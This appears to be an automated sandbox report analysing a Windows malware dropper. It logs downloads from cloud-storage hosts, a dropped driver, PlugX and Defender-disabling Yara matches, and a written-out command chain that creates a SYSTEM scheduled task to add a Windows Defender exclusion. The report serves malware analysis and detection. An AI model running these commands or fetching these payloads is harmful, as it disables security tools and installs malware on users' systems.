Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: hu5wd1.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: oheykp.net

Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: 7tqorj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif2
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU5
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921

Source: unknown	HTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.6:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49992 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.7tqorj.exe.2880000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.7tqorj.exe.2830000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 41.2.qNHTRl.exe.3100000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.41.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.41.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.41.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140006C95 NtAllocateVirtualMemory,

5_2_0000000140006C95

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

5_2_0000000140001520

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_000000014000C3F0	5_2_000000014000C3F0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_000000014000CC00	5_2_000000014000CC00
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140001A30	5_2_0000000140001A30
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_000000014000C2A0	5_2_000000014000C2A0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400022C0	5_2_00000001400022C0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400110F0	5_2_00000001400110F0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140010CF0	5_2_0000000140010CF0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140009300	5_2_0000000140009300
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_000000014000BB70	5_2_000000014000BB70
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_0000000140003F80	5_2_0000000140003F80
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00000001400103D0	5_2_00000001400103D0
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00007FFDA5810248	5_2_00007FFDA5810248
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 5_2_00007FFDA580A1B8	5_2_00007FFDA580A1B8
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Code function: 43_2_00FA4AE2	43_2_00FA4AE2

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\2U36F\NroRNr.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 2749837485743-7684385786.05.exe, 00000000.00000000.2119902937.0000000141D79000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 2749837485743-7684385786.05.exe
Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 2749837485743-7684385786.05.exe
Source: 2749837485743-7684385786.05.exe	Binary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 5.2.7tqorj.exe.2880000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.7tqorj.exe.2830000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 41.2.qNHTRl.exe.3100000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@65/29@14/3

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

5_2_0000000140003F80

Source: C:\Users\user\Documents\7tqorj.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

5_2_0000000140001430

Source: C:\Users\user\Documents\7tqorj.exe

5_2_0000000140001520

Source: C:\Users\user\Documents\7tqorj.exe

5_2_0000000140001520

Source: C:\Users\user\Documents\7tqorj.exe

File created: C:\Program Files (x86)\qNHTRl

Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6856:120:WilError_03
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.217.59.73:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Users\user\Documents\7tqorj.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_849224

Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Command line argument: tbcore3.dll	43_2_00FA1000
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Command line argument: tbcore3.dll	43_2_00FA1000
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Command line argument: tbcore3U.dll	43_2_00FA1000
Source: C:\Program Files (x86)\2U36F\NroRNr.exe	Command line argument: tbcore3U.dll	43_2_00FA1000

Source: 2749837485743-7684385786.05.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\7tqorj.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: qNHTRl.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: qNHTRl.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: qNHTRl.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: qNHTRl.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: qNHTRl.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: qNHTRl.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t

Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

File read: C:\Users\user\Desktop\2749837485743-7684385786.05.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2749837485743-7684385786.05.exe "C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
Source: unknown	Process created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
Source: unknown	Process created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
Source: unknown	Process created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
Source: C:\Users\user\Documents\7tqorj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
